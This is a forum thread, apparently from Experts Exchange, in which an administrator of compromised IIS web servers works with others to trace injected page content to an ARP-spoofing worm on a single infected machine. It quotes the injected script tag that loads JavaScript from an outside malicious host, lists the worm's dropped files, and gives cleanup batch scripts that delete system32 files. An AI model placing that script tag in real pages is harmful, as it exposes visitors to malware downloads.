blueswitch
asked on
IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere
Hi, my web servers all iss, have been compromized, we are not sure how although we think it may have been sql injection. the follwoing
Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website. We cannot clean nor find the source of the spreading. Here is the Java Source: <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>***
i have run spyware scans, virus scans, and cannot determine where the infection is coming from
and i have had to stop my web servers, does anybody have any clue
this is an emergency
Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website. We cannot clean nor find the source of the spreading. Here is the Java Source: <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>***
i have run spyware scans, virus scans, and cannot determine where the infection is coming from
and i have had to stop my web servers, does anybody have any clue
this is an emergency
ASKER
that has already been done, now im trying anything and anything to find the infection
Your website has an SQL engine embedded in it? If so, check that parameters sent to the engine are properly validated. As I understand it SQL injection is about putting formatting characters into a form. The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain. So what you've got to do is to strip out all characters that could setup such a command.
ASKER
our problem is that the hack has already happened iis has been compromised
the database and code are ok,
when i move the database and code to a clean server, the site is normal again
so my only conclusion is that the server has somehow been modified, howwver i cant find it
the database and code are ok,
when i move the database and code to a clean server, the site is normal again
so my only conclusion is that the server has somehow been modified, howwver i cant find it
Have you checked things like Stored Procedures?
ASKER
no,
but as i mentioned i have physically moved all databse files, as well as the web code to a prviously uninfected machine, and the infection does not follow
also it affects asp pages not using databases, so i have dteremined that it is infecting iis
but as i mentioned i have physically moved all databse files, as well as the web code to a prviously uninfected machine, and the infection does not follow
also it affects asp pages not using databases, so i have dteremined that it is infecting iis
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable? Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
ASKER
agreed, but for now we nee dto be able to ge tthe sites back up
not a pleasant Sunday for you...
ASKER
not at all
ASKER
interesting
here i think its a variant of those attacks where they managed to get the iis server infected
here i think its a variant of those attacks where they managed to get the iis server infected
ASKER
these are very interesting but the problem is i have a new variant, and my iis is infected.
im really at a standstill
im really at a standstill
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time. If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Good news indeed. The SQL coding needs to be reviewed for vulnerabilities, as mentioned.
You shouldn't be running two accounts on EE. I suggest you do something about that too!
You shouldn't be running two accounts on EE. I suggest you do something about that too!
Long night indeed, thanks adds21, your post pointed me in the right direction. if you find more information please do post it. Im backup and running but not sure how, with all the things i tried im not sure what one sorted the issue.
ASKER
ads 21
what did you find if its on the sql server what was the proces called
what do i look for
what did you find if its on the sql server what was the proces called
what do i look for
ASKER
i just restarted my sql server , didnt seem to have effect, i didnt see any process
Blueswitch:-
Are you doing this on the new, uninfected machine, or the infected one?
Are you doing this on the new, uninfected machine, or the infected one?
ASKER
on the infected one, i have many web and sql servers, here swhat i have found out so far
1. the infection has some type of logic, as it will not show the profanity in the title if the ip of the computer browsing the site is on the same subnet as the machine infected
meaning, all local machines on my network do not see the profanity ann all the sites.
this has been verified, by using a load balancer which maskes the user ip wand make sit appear as an internal user., and when i placed an infected machine behind the load balancer the outside world did not see the profanity
2. i think its on the web server and iis not sql, as when i used a clean iis machine, (that has sql installed)
and used that, whil etrasfering the entire dtaabse folder, inluding the master msdb etc, to the is machine from an infected machine, the problem went away
1. the infection has some type of logic, as it will not show the profanity in the title if the ip of the computer browsing the site is on the same subnet as the machine infected
meaning, all local machines on my network do not see the profanity ann all the sites.
this has been verified, by using a load balancer which maskes the user ip wand make sit appear as an internal user., and when i placed an infected machine behind the load balancer the outside world did not see the profanity
2. i think its on the web server and iis not sql, as when i used a clean iis machine, (that has sql installed)
and used that, whil etrasfering the entire dtaabse folder, inluding the master msdb etc, to the is machine from an infected machine, the problem went away
ASKER
one more thing it only affects port 80
so if the site is under ssl the hack does not take affect
has anybody else been affected
so if the site is under ssl the hack does not take affect
has anybody else been affected
ASKER
ok
the problem has been resolved, the problem is on the sql server as posted above. its an arp attack
a sql injection attack installs an executable on one of teh sql servers
that sql server becomes a psudo gateway intercepting all web traffic and appending the code above
it does not modify sql or iis ain any way
the problem has been resolved, the problem is on the sql server as posted above. its an arp attack
a sql injection attack installs an executable on one of teh sql servers
that sql server becomes a psudo gateway intercepting all web traffic and appending the code above
it does not modify sql or iis ain any way
ASKER
additionally, while it may apear many machines are infected, only one is infected, ( a sql server)
and it has some program running that sintercepting the arp traffic and causing all teh problems
isaac
and it has some program running that sintercepting the arp traffic and causing all teh problems
isaac
As an update, i've been unable to find the source of the SQL Injection but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm i found files relating to the following,
http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html
wpcap.dll and the ohher files can indeed enable an uploaded files to access the network card at the network level and hence mess with ARP and other traffic.
Stephen
http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html
wpcap.dll and the ohher files can indeed enable an uploaded files to access the network card at the network level and hence mess with ARP and other traffic.
Stephen
blueswitch,
What is the name of the exe. I still can not find it on any of my servers.
What is the name of the exe. I still can not find it on any of my servers.
The EXE was called wapsrv.exe it had a created date of the 21st, the full list of files that were created are as follows.
System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
Thank you stephenevans! Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
I found the culprit I made 2 scripts one for 2000 and one for XP/Server
2000.bat
del c:\WINNT\system32\packet.d
del c:\WINNT\system32\wanpacke
del c:\WINNT\system32\wapsrv.e
del c:\WINNT\system32\wpcap.dl
del c:\WINNT\system32\drivers\
pause
XP/Server
del c:\windows\system32\packet
del c:\windows\system32\wanpac
del c:\windows\system32\wapsrv
del c:\windows\system32\wpcap.
del c:\windows\system32\driver
pause
These batches did find some files and delete them but eventually I found one machine with access denied on the deletion. After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:
C:\WINDOWS\system32\svchos
Thanks again stephenevans
2000.bat
del c:\WINNT\system32\packet.d
del c:\WINNT\system32\wanpacke
del c:\WINNT\system32\wapsrv.e
del c:\WINNT\system32\wpcap.dl
del c:\WINNT\system32\drivers\
pause
XP/Server
del c:\windows\system32\packet
del c:\windows\system32\wanpac
del c:\windows\system32\wapsrv
del c:\windows\system32\wpcap.
del c:\windows\system32\driver
pause
These batches did find some files and delete them but eventually I found one machine with access denied on the deletion. After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:
C:\WINDOWS\system32\svchos
Thanks again stephenevans
svchost.exe was being run from c:\windows\system32\waptim
Triggered from HKEY_LOCAL_MACHINE\SOFTWAR
Triggered from HKEY_LOCAL_MACHINE\SOFTWAR
First of all thank you all for your input.
I checked every server on my network and none of the following files "packet.dll,wanpacket.dll,
I checked every server on my network and none of the following files "packet.dll,wanpacket.dll,
It doesn't have to be a server, the machine that we ended up finding it running on was a XP client PC.
If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router. Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router. Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
I was under the impression that it was a server virus, thanks for information. What anti-virus software are you running on the workstations?
For the sake of Google & Search engines
http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99
this is the original Culprit, a Low profile worm that injects malicious HTML code into local HTTP traffic, using ARP poisoning attacks , the IFrames injected differ, but the payload is usually executing JS / VBS trojan downloaders , Mcafee detects it as Trojan VBS/ PSYME , Kaspersky detects it as Trojan-Downloader.JS.Multi
upon execution this will download further Malwarem, some of them were extremely difficult to remove.
I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands on cleanup, once cleaned, other users who experienced the VBS/PSYME message
http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99
this is the original Culprit, a Low profile worm that injects malicious HTML code into local HTTP traffic, using ARP poisoning attacks , the IFrames injected differ, but the payload is usually executing JS / VBS trojan downloaders , Mcafee detects it as Trojan VBS/ PSYME , Kaspersky detects it as Trojan-Downloader.JS.Multi
upon execution this will download further Malwarem, some of them were extremely difficult to remove.
I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands on cleanup, once cleaned, other users who experienced the VBS/PSYME message
First off, turn off access to your site, noone is going to thank you for screwing up their system.